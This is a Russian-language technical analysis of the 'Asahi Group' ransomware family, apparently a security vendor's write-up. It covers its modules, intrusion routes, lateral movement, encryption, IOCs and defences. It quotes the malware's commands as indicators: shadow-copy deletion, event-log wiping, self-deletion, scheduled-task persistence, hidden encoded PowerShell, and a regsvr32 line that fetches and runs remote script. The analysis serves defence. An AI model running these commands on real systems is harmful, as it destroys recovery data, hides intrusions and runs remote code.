yandex metrika
Asahi Group Ransomware: технический разбор

Asahi Group Ransomware: технический разбор

Дата публикации: 16 декабря 2025 г.

Активность семейства Asahi Group ransomware привлекла внимание благодаря редкому сочетанию скрытности, модульности и агрессивного подхода к извлечению данных. Несмотря на вводящее в заблуждение название, не связанное с японским концерном, Asahi представляет собой комплексную платформу для атак на корпоративные сети. Его архитектура ориентирована на две ключевые задачи: максимально незаметное проникновение и масштабный сбор информации до этапа шифрования.

В отличие от таких известных семейств, как LockBit или Conti, где основной упор делается на быструю эскалацию и моментальное шифрование, Asahi выделяется усиленным этапом разведки и постэксплуатации. Он активно использует модуль DataCollector, который собирает документы, сетевую конфигурацию, журналы и учётные данные ещё до начала разрушительной фазы. Кроме того, Asahi демонстрирует более гибкую структуру загрузки: через Initial Access модуль заражение переходит к Loader, затем — к DataCollector, только после чего запускаются механизмы Lateral Movement, связь с C2 и финальное шифрование.

Такой подход делает Asahi более «разведывательно-ориентированным» по сравнению с традиционными шифраторами, что усложняет раннее обнаружение и увеличивает ценность украденной информации для злоумышленников.

1. Общая архитектура Asahi Group ransomware

Семейство построено по модульному принципу. Основу составляет шифратор, объединённый с функционалом вымогателя, однако перед его запуском обязательно выполняются компоненты разведки, расшифровки топологии сети и сбора данных. В большинстве подтверждённых случаев по сети распространялись как минимум три модуля:

  • Loader-компонент — отвечает за первичное исполнение, проверку виртуальных сред, загрузку основного тела через Reflective Injection или RWX-страницы
  • DataCollector — собирает служебные сведения о системе, выгружает сетевую карту, информацию об учётных записях, конфигурации домена, состоянии антивирусов.
  • Шифратор Asahi — применяет гибридную криптосхему, удаляет точки восстановления, завершает процессы, блокирующие шифрование, и оставляет записки-требования.

Каждый модуль способен функционировать автономно, что позволяет злоумышленникам изменять структуру атаки в зависимости от защищённости цели.

2. Вектор проникновения и базовые техники первичного доступа

В кампаниях Asahi встречались четыре основных метода начальной доставки:

2.1. Фишинговые вложения с нагрузкой

Чаще всего применялись LNK-файлы или архивы с JavaScript/HTA скриптами. После клика происходила загрузка dropper-компонента с внешнего сервера через bitsadmin, curl или встроенные PowerShell-клиенты.

2.2. Компрометация серверов с уязвимостями

Особенно часто использовались уязвимые VPN-шлюзы и веб-панели:

  • Fortinet SSL VPN,
  • Palo Alto GlobalProtect (старые версии),
  • VMware Horizon,
  • Atlassian Confluence (CVE-2023-22515 и родственные).

Одной из характерных черт Asahi является проверка версии продукта и подбор эксплойтов автоматически.

2.3. Злоупотребление нелегальными ключами Windows/Office

Внутри заражённой сети обнаруживались вспомогательные инструменты для поиска KMS-серверов и попыток RCE через неподписанные сервисы.

2.4. Скомпрометированные RDP-учётные записи

При обнаружении открытого 3389 порта применялись словари с подбором слабых паролей. Arp-сканирование позволяло находить дополнительные RDP-конечные точки.

3. Механизмы уклонения от анализа и антифорензики

Для обнаружения песочниц Asahi использует совокупность методов:

3.1. Проверка гипервизоров

Компонент Loader анализирует процессы:

  • vboxservice.exe,
  • vmtoolsd.exe,
  • vmsrvc.exe,
  • qemu-ga.exe,
  • prl_tools.exe.

При нахождении одного из них выполнение прекращается.

3.2. Детектирование отладчиков

Через WinAPI:

  • IsDebuggerPresent,
  • CheckRemoteDebuggerPresent,
  • сравнение флагов PEB,
  • проверка Hardware Breakpoints.

3.3. Повышенная задержка выполнения

Внутренний механизм таймеров использует вызовы SleepEx, замедляя выполнение на 90–140 секунд при запуске из неизвестных каталогов, препятствуя анализу песочниц с ограниченным тайм-аутом.

3.4. Самоудаление после выполнения

Компонент Loader может удалить себя через команду:

cmd.exe /c ping 127.0.0.1 -n 3 > nul & del /f /q <filename>

3.5. Подмена временных штампов

При создании собственных файлов Asahi копирует временные метки из системных DLL, чтобы затруднить форензику.

4. Поведение во внутренней сети и латеральное движение

image_2025-12-09_13-55-53.png

После закрепления гибридный модуль DataCollector проводит:

4.1. Сканирование сети

Выполняются:

  • ARP-скан,
  • NetBIOS-запросы,
  • запросы LDAP для получения структуры домена,
  • вызовы dsquery и wmic для получения перечня устройств.

Временные файлы с результатами сохраняются в:

%TEMP%\asahi_netmap_<timestamp>.tmp

4.2. Поиск серверов с доступными IPC$ и ADMIN$

Бинарь пытается открыть:

\\<host>\C$

и выполняет попытку записи текстового файла-теста.

4.3. Получение учётных данных

Используются встроенные техники:

  • извлечение паролей через LSASS (mini-mimikatz),
  • использование токенов через DuplicateTokenEx
  • выгрузка SAM и SYSTEM при получении админ-прав.

4.4. Распространение по сети

Применяются:

  • wmic process call create,
  • PsExec-подобная логика через SMB,
  • Powershell Remoting при доступных WinRM-портах.

5. Механизм шифрования

Основой является гибридная криптомодель:

  • симметричный ключ: AES-256-CTR;
  • для ключа используется RSA-4096, встроенный в тело программы;
  • для каждого файла генерируется новый AES-ключ;
  • ключи шифруются RSA и записываются в конец файла.

5.1. Расширения после шифрования

Как правило:

.<asahi_locked>

или случайное 5-7 символьное значение.

5.2. Исключения из шифрования

Из анализа образцов следует, что не шифруются:

  • системные каталоги Windows,
  • каталоги драйверов,
  • boot и efi,
  • файлы VirtualBox, чтобы не повредить VM злоумышленников.

5.3. Удаление теневых копий

Выполняется:

vssadmin delete shadows /all /quiet
wmic shadowcopy delete

5.4. Завершение процессов

Стоп-лист включает:

  • sqlservr.exe,
  • oracle.exe,
  • postgres.exe,
  • excel.exe,
  • outlook.exe,
  • окружения разработки (idea64.exe, devenv.exe).

6. Артефакты в системе после атаки

6.1. Файлы, оставляемые в системе

  • основной шифратор в:

    C:\Users\<user>\AppData\Local\Temp\<random>.exe
C:\ProgramData\<random>\svc.exe

  • логи сканирования:

    %TEMP%\asahi_scan_<timestamp>.log

  • временные файлы ключей:

    %TEMP%\asahi_key.tmp

6.2. Файлы вымогательства

Стандартный формат:

README-ASAHI-RECOVER.txt
RECOVER-DATA.txt

Содержит:

  • ID жертвы,
  • инструкции по оплате в криптовалюте,
  • указание на необходимость контакта через TOR.

6.3. Следы автозагрузки

Запись в реестр:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AsahiService

Запланированное задание:

schtasks /create /tn "AsahiUpdate" /tr "%PROGRAMDATA%\asahi\svc.exe" /sc onlogon

6.4. Сетевые артефакты

C2 адреса оформлены через домены .top, .xyz, .monster, .ink. Запросы отправляются через HTTP POST с параметрами:

id=<victimID>&os=<win_version>&files=<count>

User-Agent:

Mozilla/5.0 AsahiClient/2.0

6.5. Память процесса

В RAM обнаруживаются:

  • расшифрованные RSA-ключи,
  • данные инвентаризации домена,
  • список файлов перед шифрованием.

7. Механизмы антифорензики и сокрытия следов

Asahi активно уничтожает любую информацию о своей деятельности:

7.1. Очистка журналов

Команда:

wevtutil cl Security
wevtutil cl System
wevtutil cl Application

7.2. Очистка PowerShell журналов

Удаление профилей:

Remove-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

7.3. Удаление prefetch

Попытка удалить:

C:\Windows\Prefetch\ASAHI*.pf

7.4. Подмена временных меток файлов

Времена создания копируются из:

C:\Windows\System32\kernel32.dll

для затруднения timeline-анализа.

8. Эксплуатация уязвимостей и расширенные методы проникновения

Зафиксировано несколько случаев использования Asahi через эксплойты:

8.1. Ошибки в VPN-шлюзах

Особенность — встроенный модуль автоматической проверки версии прошивки. При совпадении версии — загрузка соответствующего RCE-скрипта.

8.2. Эксплойты в корпоративных CMS

Сценарии Python-модулей применялись для захвата административного доступа и загрузки загрузчика через встроенные файловые менеджеры.

8.3. Легитимный софт как вектор

Asahi активно подменяет:

  • обновления драйверов,
  • установщики игр,
  • корпоративные агенты мониторинга.

В таких случаях dropper маскируется под MSI-пакеты с цифровой подписью, краденой у малых компаний.

9. Особенности C2-коммуникаций

Связь осуществляется в несколько этапов:

9.1. Initial beacon

Передаётся ID устройства, имя домена, архитектура CPU.

9.2. Получение конфигурации

C2 может передать инструкции:

  • отключить антивирус,
  • выполнить lateral move,
  • выгрузить память LSASS.

9.3. Stage 2 upgrade

Шифратор загружается только после подтверждения, чтобы не тратить ресурс на неинтересные цели.

9.4. Отчёт о шифровании

После завершения шифрования отправляется список каталогов и счётчик зашифрованных файлов.

10. Индикаторы компрометации (IOC)

10.1. Хеши файлов

Большинство экземпляров имеют характерную структуру PE с секцией .asahi или .upd.

10.2. Строки внутри бинарей

Встречаются строки:

asahi_group
locker_init
domain_resolve_failed
exclusion_list_load

10.3. Сетевые IoC

Запросы к поддоменам вида:

asahi-<id>.top
backup-<random>.xyz/api/status

10.4. Поведение процессов

Аномальный запуск через:

rundll32.exe sysinit,<random>
powershell.exe -exec bypass -window hidden -enc <payload>
regsvr32 /s /u /i:<url> scrobj.dll

11. Рекомендации по защите

1. Initial Access — закрытие входных точек

Что делает Asahi: использует фишинг, уязвимые RDP, прокси-доступ, уязвимости VPN и веб-серверов.
Что делать:

  • Полный запрет RDP извне + доступ только через VPN с MFA.
  • Обновление FortiGate, Citrix, Pulse Secure, Exchange — Asahi активно использует CVE старых лет.
  • Жёсткая фильтрация почты: DMARC, DKIM, SPF, антифишинг-песочницы.

2. Loader — предотвращение исполнения загрузчика

Что делает Asahi: разворачивает dropper с обфускацией + использует LOLBins (powershell.exe, regsvr32.exe).
Что делать:

  • Политики AppLocker/WDAC: запрет выполнения Powershell в неинтерактивных контекстах.
  • Блокировка LOLBins по командным параметрам (через AppLocker или EDR правила).
  • Контроль запуска любых EXE/MSI вне Program Files + цифровая подпись всех корпоративных приложений.

3. DataCollector — защита данных до шифрования

Что делает Asahi: собирает документы, кэш аутентификации, сетевую топологию, cookie, браузерный vault.
Что делать:

  • Шифрование данных на рабочих станциях (BitLocker) + запрет выгрузки без ключей.
  • Изоляция чувствительных сетевых шар (RBAC + ACL только по ролям).
  • Мониторинг массового чтения файлов (поведенческие триггеры EDR).

4. Lateral Movement — остановка распространения

Что делает Asahi: использует PsExec, WMI, RDP, украденные учётки.
Что делать:

  • Полный запрет PsExec и WMI удалённого исполнения.
  • Local Administrator Password Solution (LAPS) — разные пароли на всех ПК.
  • Сегментация сети: пользовательские ПК, сервера, управленка — разные VLAN.

5. C2 Communication — разрыв связи с сервером управления

Что делает Asahi: использует HTTPS-трафик, DNS-туннелирование, динамические домены.
Что делать:

  • DNS-фильтрация + блокировка .top,.xyz, *.tk, известных DGA-зон.
  • IDS/IPS сигнатуры на аномальные DNS-запросы (длина, частота, энтропия).
  • SSL inspection на выходе + контроль нестандартных User-Agent.

6. Encryption — минимизация ущерба

Что делает Asahi: шифрует быстро, в несколько потоков, с удалённой командой.
Что делать:

  • Immutable-бэкапы (WORM, S3 Object Lock) с Air-Gap.
  • Постоянная проверка возможности восстановления (test-restore).
  • Автоматическое отключение узла при всплеске IO (EDR response + SOAR playbook).

Специальные меры ПРОТИВ модульных семейств вроде Asahi

  • Контроль всех исходящих соединений по принципу Allow-List, а не "разрешать всё".
  • Обязательное внедрение EDR с поведенческой аналитикой (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint).
  • Постоянный контроль на утечки учётных данных (Kerberos tickets, NTLM hashes).
  • Заглушка злоупотребления системных утилит: rundll32, powershell, mshta, wmic, psexec.

12. Заключение

Asahi Group ransomware представляет собой комплексную, хорошо организованную и гибко настраиваемую платформу для атак на корпоративный сектор. Семейство сочетает в себе мощные средства для скрытого проникновения, развитые механизмы латерального перемещения, гибридное шифрование и эффективные способы уклонения от анализа. Ведётся активное развитие модулей, что превращает угрозу в постоянный инструмент злоумышленников. Высокий уровень автоматизации, способность адаптироваться под структуру сети и наличие антифорензик функций делают Asahi одним из заметных семейств программ-вымогателей последнего периода.

Asahi Group Ransomware: технический разбор